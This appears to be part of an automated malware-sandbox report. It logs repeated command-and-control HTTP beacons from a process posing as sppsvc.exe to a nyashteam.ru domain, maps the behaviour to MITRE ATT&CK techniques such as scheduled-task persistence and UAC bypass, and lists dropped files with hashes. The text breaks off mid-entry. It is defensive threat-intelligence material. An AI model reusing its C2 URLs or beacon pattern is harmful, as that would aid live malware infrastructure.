GET /nyashsupport.php?lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JvNfHMKs4rRK2VHYI%2BEbQfy4F8l0FCMOWhOkmLJboRz59%2BXirNuNQvXami7sefFWHqUth6JVP6H71Hpj9wLbskUOvqVdk3JXr7x3eqmRUB4njZXgN6hT1xSwslqOP5W7ct%2B%2FIUx4hZz56g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2085dbfe7a6359-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AC9wJYRZ%2BbSrnruZah3xufoXsFzdpet%2FSgYM1KS51Cy7IbHxB1bKDmuTPz4ZnKC24QG%2BMWaSfeLOTK3o62CXOh39Oe64Jqpox38GNreayv%2FQ9%2Bquew7hwL5UpCOlKsww9dOMNd5AKYu8JA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c208621994ecd8a-LHR
alt-svc: h3=":443"; ma=86400
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cNHZK5xQfrib0MOw0Wsb1LkPqSrVb0bDlD60jxThJL8FjjT9Sr2h2fqQaWk7MPV6QlCQQ2PSsOTUHfdRxmim0G5KkGboV4tQQBU%2Bi8%2BYEmFkQ1AIHfMwVhXqK%2BgxZWlvd3zB2YoBtW2n5w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2086232c6dcd8a-LHR
alt-svc: h3=":443"; ma=86400
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1 HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:18:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V3Cyk687%2BFJhu5gbYyMAM88IqI0zPemQUYnDFSz%2FPLweKy0tdkxHExgJ3p8BkLCr1W7xkormU2p0RCZ%2BrB3crld0tbe4BCd2RMevza71rcclSfZCFi7LGPmodc3GzzUJUylN%2FgCVqKeBhg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c208699bde6947f-LHR
alt-svc: h3=":443"; ma=86400
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1 HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:18:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=511sEXZ0Weiy3H2D4SSJGTicCd4zZ1B15jl0tCsMlnK0uFqZumDBIv5PiwXeM0pmIpn2nL3fMzS5EOyjFC8GyEV%2BVmPkXgbKtI%2FV6gc5a4qUYO%2FWrnIGxkI2RIH2brqrNfo%2BuhLgSo%2BgVg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c20869b1fe5947f-LHR
alt-svc: h3=":443"; ma=86400

104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM

http

sppsvc.exe

1.2kB
1.5kB
7
6

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j

http

sppsvc.exe

1.4kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ

http

sppsvc.exe

1.2kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt

http

sppsvc.exe

1.1kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ

http

sppsvc.exe

1.4kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl

http

sppsvc.exe

1.6kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&bRg=g7193AvACb9uTK464A3q5mDTvHqgjW&yOrOSeMYngfTS1sFcNCI=Y0A33iOwUPapyKg&5mcslPJZSvcCCNShOLaY=UZ68lSQFoeqMdglkZzIqkl

HTTP Response

404
104.21.2.8:80

http://81888.cllt.nyashteam.ru/nyashsupport.php?wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1

http

sppsvc.exe

1.3kB
1.5kB
7
7

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1

HTTP Response

404

HTTP Request

GET http://81888.cllt.nyashteam.ru/nyashsupport.php?wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&wXWoQbtKwF=2mdiWmnJHSh65PBXswpOpiG5QaxUHk1

HTTP Response

404

8.8.8.8:53

81888.cllt.nyashteam.ru

dns

sppsvc.exe

69 B
101 B
1
1

DNS Request

81888.cllt.nyashteam.ru

DNS Response

104.21.2.8

172.67.186.200

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\408377c1-5825-4ba0-9728-7e4027fb671d.vbs

Filesize
757B

MD5
b6079aa4b6c443f0ff5be6d4570d8055

SHA1
9492c01488898788c13cd9aa089e4b2be0b2a800

SHA256
3725b43e41d6102f07370713c666f9c9ddf7a66b6da17126356de6a9596b4cae

SHA512
4ee768d54285a38914cf016c86bb4c898806b1350b04bab478772b3ca057a3788ceb84455d274d22d5fb703336111c194575404a5265dc4946f707f4573ddb6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\60e7b06c-4491-447c-95fc-4642800edf96.vbs

Filesize
757B

MD5
cef39c1d5468d02a883a32593f5b197d

SHA1
95fd45a3eedc6d54d0ba844c2aa0f397697e2ff7

SHA256
dfbe1426b8905e758642b6f04471ed19ba7f419ce942b6f9c188ba77cfc87c12

SHA512
b1a5b4be1d22286734094864ebfec87ce23679c3fe745e40edbc2aa1ea4fb90d56a9b3d3bdb85cda4905b09101af926ba4bf2862e4acb162f73f5b173964a3a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7a7215af-a79d-40d2-b64a-060e0ca00bed.vbs

Filesize
757B

MD5
b96709700623c578aab2bc9bc8935dd4

SHA1
635aab0315ecb88ac6a123624dcc4be3c0c83bc4

SHA256
178da982fffd62877ae99b6b8f62f19b411e5e7302ddc0799d61482f8d16cac7

SHA512
10fddea6cacf4c689606a3cb0b420e410dc9f73568b45a9324423397430a8ffbf23e1184c8f9f31440b125637f19b328f10af8b55ca08be2606a3079694bd362

Download Submit
C:\Users\Admin\AppData\Local\Temp\8d186c95-dab6-462b-a343-6bf3e34954de.vbs

Filesize
757B

MD5
4e42afed0549f75bc518e67b978902cf

SHA1
2bd2c51098faacabbcf02199d4234305a2537a42

SHA256
f8b3bcdde3e006191f26e3f3c8c0de0304aa1d6e5a7ad2b385cbf6f71b95861b

SHA512
146b652894dbe1be32ca919c504bf0fba0771efe9e051f6ac3e0508142b6418b2e6c7212cc941a06f1d8c666d1a8f01db90c74da0597210bded3f2ecbd36c1d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\cbaa5748-3db0-4a30-bcde-c67e4e75adb2.vbs

Filesize
757B

MD5
5177c5ac3538c60ec648eb9fdb26c702

SHA1
ff2e398a185aa56aa465b0e931332ececc8d7f39

SHA256
f0be22edca38315083c63e6240b104d4bc508f24d2ee021ee8bb3680896aae4d

SHA512
9c2ad7ae035364079c3a7ae07774d5e61b815abb13a6f8d85c8aa23c6f3e9d920bcded952fb8e9f38329d98c8c0b1b0a5c3935b5f757b715c55ffd3f81e2359d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ce713ec0-df60-4489-95b6-133fa1605fda.vbs

Filesize
757B

MD5
59df3ec037fb7e7467cc21035bc0ddef

SHA1
382e4a3067a15f8bf99c08baf70e2a32e458c3f1

SHA256
8d5146ef4f07f7ca1ec7651dac2ca2f9b10733fbf14b9e0da586c5b11beacb52

SHA512
3e6ee4d77ab16a758b848f35939b098f24f45e855af40fe12f9c1280c6b7e7a60c65130f95b4fe842707732646ff32971a49e6fa22e5877d73bafd54ab2e1211

Download Submit
C:\Users\Admin\AppData\Local\Temp\dc671ec6-f7f3-48fd-909b-90343576f257.vbs

Filesize
533B

MD5
d65317641551435f11a36ba706e2c240

SHA1
a82e8fc672b9aa04a1c5c08b0ecaa63fefcb4381

SHA256
de2116f96ef9e6982603d4f941a8a029fbaa8f9cf603da1ad35cbc6bad9100c9

SHA512
7f45bd6fc934fcdefc28c04c48707c5caf0516c42d9bff35be205aa71f84f5a7f54c4fde0a977f05b244f0820c5d5d353b10859b054767a22f02880d245f67d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\e3800567-4f92-4cbd-9314-304dd32b4d7f.vbs

Filesize
757B

MD5
a5b965a17481e0c548737a31df732075

SHA1
f830acd9b61eccfbe047be31887e194d35acca2c

SHA256
61672ba0638d966308514741e32715b903421c24fde40a0189a432612ec01633

SHA512
1383b0f8f7ba6f02a8c8410d0bf5bf4cd06d145479570adf73701162af002d27a102a58ed99c2812cddba129f1237ad5ff6d7c40ab19cfcf9c1eac1846db4225

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4BA1.tmp.exe

Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
45e8b99a3c656da3c51783d9bed6b343

SHA1
6f3c70f2cd96b93ea353223a4aeef080da0c7743

SHA256
307ca468d1edb57beb6853360b8048e69b21eaf539a98a3d81ec0b92af6cb294

SHA512
db8059ea54dc0ffb73b86c440d4a930db24692f0bbdf260d6668b91316593c1807261e9f31d4ea3dec9d1560603bb7eaab0742ddd24ca8780ce02a32298cedcd

Download Submit
C:\Windows\addins\Idle.exe

Filesize
4.9MB

MD5
443110dabe7095bf8afe27bf3dc27f60

SHA1
03554dc5583fd4d38124bf4f65405faadf61543e

SHA256
